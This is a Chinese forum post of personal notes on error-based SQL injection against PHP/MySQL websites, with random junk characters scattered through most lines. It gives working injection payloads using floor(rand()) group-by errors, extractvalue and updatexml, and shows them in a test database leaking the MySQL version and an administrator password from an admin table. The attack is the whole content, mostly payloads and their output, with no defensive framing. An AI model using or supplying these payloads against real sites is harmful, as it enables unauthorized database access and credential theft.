放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
( ~+ g$ I! J2 D4 X6 \2 Q实际测试环境:7 G3 c- Y* K% |$ [$ i1 j" A
* }; _2 C) ^9 w! Z3 K7 z* }8 F8 s0 ^
4 f- t! [, C8 i0 F+ jmysql> show tables;
4 d! R6 d! J4 T! _; K1 h+----------------+
% C8 F* D9 o- N9 c- J4 y. P5 P4 ]( |9 n| Tables_in_test |
: t$ H: t' J& ~1 {4 L8 b+ u7 `+----------------+
& G& Z( d+ t1 q| admin |
) t/ n* V' ?) y$ X }0 L; F# {| article |
8 G; J% v1 a5 o3 L. Y1 y+----------------+
/ E8 o8 R: O* v% K! }) s# N% g 8 p' \! A; G" O Y
; N2 G3 R! n6 E" y% x7 a! L b
2 S( U5 M7 |8 {) y- u6 L
mysql> describe admin;
: X; O: w! l; Q; X+-------+------------------+------+-----+---------+----------------+0 B- Q _, G7 O
| Field | Type | Null | Key | Default | Extra |
3 ^. U: L: h$ R2 S. w# H+-------+------------------+------+-----+---------+----------------+
# c$ Q$ w5 t- i( p5 P: q| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
3 A3 t" i8 s9 ^* O. b# T0 V) o| user | varchar(50) | NO | | NULL | |
$ j) [% C* o; J/ i* o, ?| pass | varchar(50) | NO | | NULL | |- t7 m! e, r$ S" o) `/ ]8 k H" ^
+-------+------------------+------+-----+---------+----------------+% y+ N& G1 V0 ]
( k/ m: L/ T! j
+ ]3 D' H6 C' k/ A
1 }) ]0 F" y0 omysql> describe article;
# }5 y5 e+ H2 P1 H( r+---------+------------------+------+-----+---------+----------------+
; p8 ?% i: W" F3 Z2 i| Field | Type | Null | Key | Default | Extra |* j/ M! q! G+ Q6 v
+---------+------------------+------+-----+---------+----------------+
/ [; ~! w& E4 p: d6 e' p| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
7 Z; s+ M5 T' V, H" X3 f| title | varchar(50) | NO | | NULL | |
% s6 b; ^8 u5 ~9 p; ]+ k5 X| content | varchar(50) | NO | | NULL | |6 P w5 r3 p7 S) A3 Q) A- G( n2 s
+---------+------------------+------+-----+---------+----------------+
# m2 j% g* R& m# P3 S1、通过floor报错0 M1 {( Q' K$ s; C# F
可以通过如下一些利用代码
# F$ d1 @8 \5 F9 `' c # |8 U& `* o! H2 J( w: S1 ?' r
+ X" \# _. C' e6 U7 i k. \
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
6 m# z6 {# s; t3 B& J4 jfrom information_schema.tables group by x)a);( ^' U: c$ x6 M4 A* }3 r3 r
; G% v3 f, O. {# f3 ^
2 s7 W* H$ r+ O% U+ V( e
and (select count(*) from (select 1 union select null union select !1)x
: J7 i. C4 a* kgroup by concat((select table_name from information_schema.tables limit 1),
& h& K. Z* h( d+ F1 `- @8 G$ xfloor(rand(0)*2)));
. r3 T d" |- k3 @2 E3 A, |举例如下:, U! _4 I0 S. D7 U1 ]+ d6 p1 c
首先进行正常查询:$ _, l+ [9 u1 X% B# |4 u. j. _/ ?
7 U) k9 q. w; ^6 g$ C; Zmysql> select * from article where id = 1;: o7 V' H0 d0 O5 M. E$ H
+----+-------+---------+
5 s9 {, r, q& a7 U6 S `| id | title | content | C) I: b+ ]2 g6 L% u
+----+-------+---------+
$ b( s2 [1 _/ t$ A| 1 | test | do it |! R2 p- w0 l0 t' y1 g- B' h3 i
+----+-------+---------+; q+ n5 x6 L$ S0 l8 y+ W+ d4 K, e
假如id输入存在注入的话,可以通过如下语句进行报错。
6 N8 O" u1 M9 l3 E
" F0 R h5 S7 @ ! n& F1 X; _. N# _6 L: f
mysql> select * from article where id = 1 and (select 1 from
* s! {; E' ?$ ~( f5 u) A' W9 ^/ e(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
/ U# A( V: F! \5 G V0 [ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'; h9 B/ `/ U( T. `
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
* D# b7 w0 }) `( m0 [例如我们需要查询管理员用户名和密码:# o; ?/ O* d9 `
Method1:. ]- L; M- q6 g0 ^$ v7 p
# h- `5 c9 ?! E, }% x% D% d0 ? 0 ^4 g+ ~$ B& ?! f9 l8 g* V
mysql> select * from article where id = 1 and (select 1 from. b4 A9 }$ Y0 m& }4 k3 U
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x5 ]! V( L* S/ j- O' H( t; s
from information_schema.tables group by x)a);
, F6 |1 M. k, q3 J# V& lERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
' S$ J' o$ X5 x1 gMethod2:: ~ Q8 o3 u [9 l7 K
/ m1 W" F4 d# B5 K( I
* l4 u5 `; G- c. O1 bmysql> select * from article where id = 1 and (select count(*)
7 a8 n/ I1 S3 w7 g! jfrom (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
) r) A6 S6 h- \' Jfloor(rand(0)*2)));
6 E* `2 [) ]8 m, o) [0 qERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2 P/ c: {5 p+ d& U. F) T2、ExtractValue
2 H. v+ x9 T' b2 u5 Y测试语句如下
5 N9 r: h7 X& L$ Q/ g" V 1 n/ B* s; S* M
- \' z; ]* B- s9 \8 `6 r5 \
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
0 I2 f* e7 K0 m$ n2 H实际测试过程
0 u; u$ h: j0 p7 a3 Z! I
. R( V7 B! U& Q1 y2 c \2 y - ^" m8 V' D5 y3 B( J n4 \# M8 [
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
5 R, O# L* a, A(select pass from admin limit 1)));--/ H# d- h! q' Q, C2 L0 ^
ERROR 1105 (HY000): XPATH syntax error: '\admin888', W/ a8 l. M1 z% }
3、UpdateXml( c2 f3 n; n: _: z7 l. l1 b
测试语句
% {& V H0 h2 T3 @9 l e, J9 ?7 ?3 n3 @ x4 I2 s
) m5 w( D# Q; j
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
3 e4 Y" G) P3 |实际测试过程
/ b. X7 i. [9 c+ M- o2 Y; ?9 `, a7 U
; H, x+ _# x2 t- Q/ b$ j ( W! b8 G* D, f' C$ j% e+ o
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
4 s w7 J" ], m: X+ }: j(select pass from admin limit 1),0x5e24),1));
+ H; R# F6 w# [. j& ?# z! `$ |4 `ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
: m% o( q, q! \' dAll, thanks foreign guys.
( ?6 w8 p$ }+ k8 Y' I
( c" C% f7 Q& D6 v8 `2 O0 G! F8 J! S7 C: ^8 W6 A% J
|
发表于 2012-12-10 10:28:51
收藏
支持
反对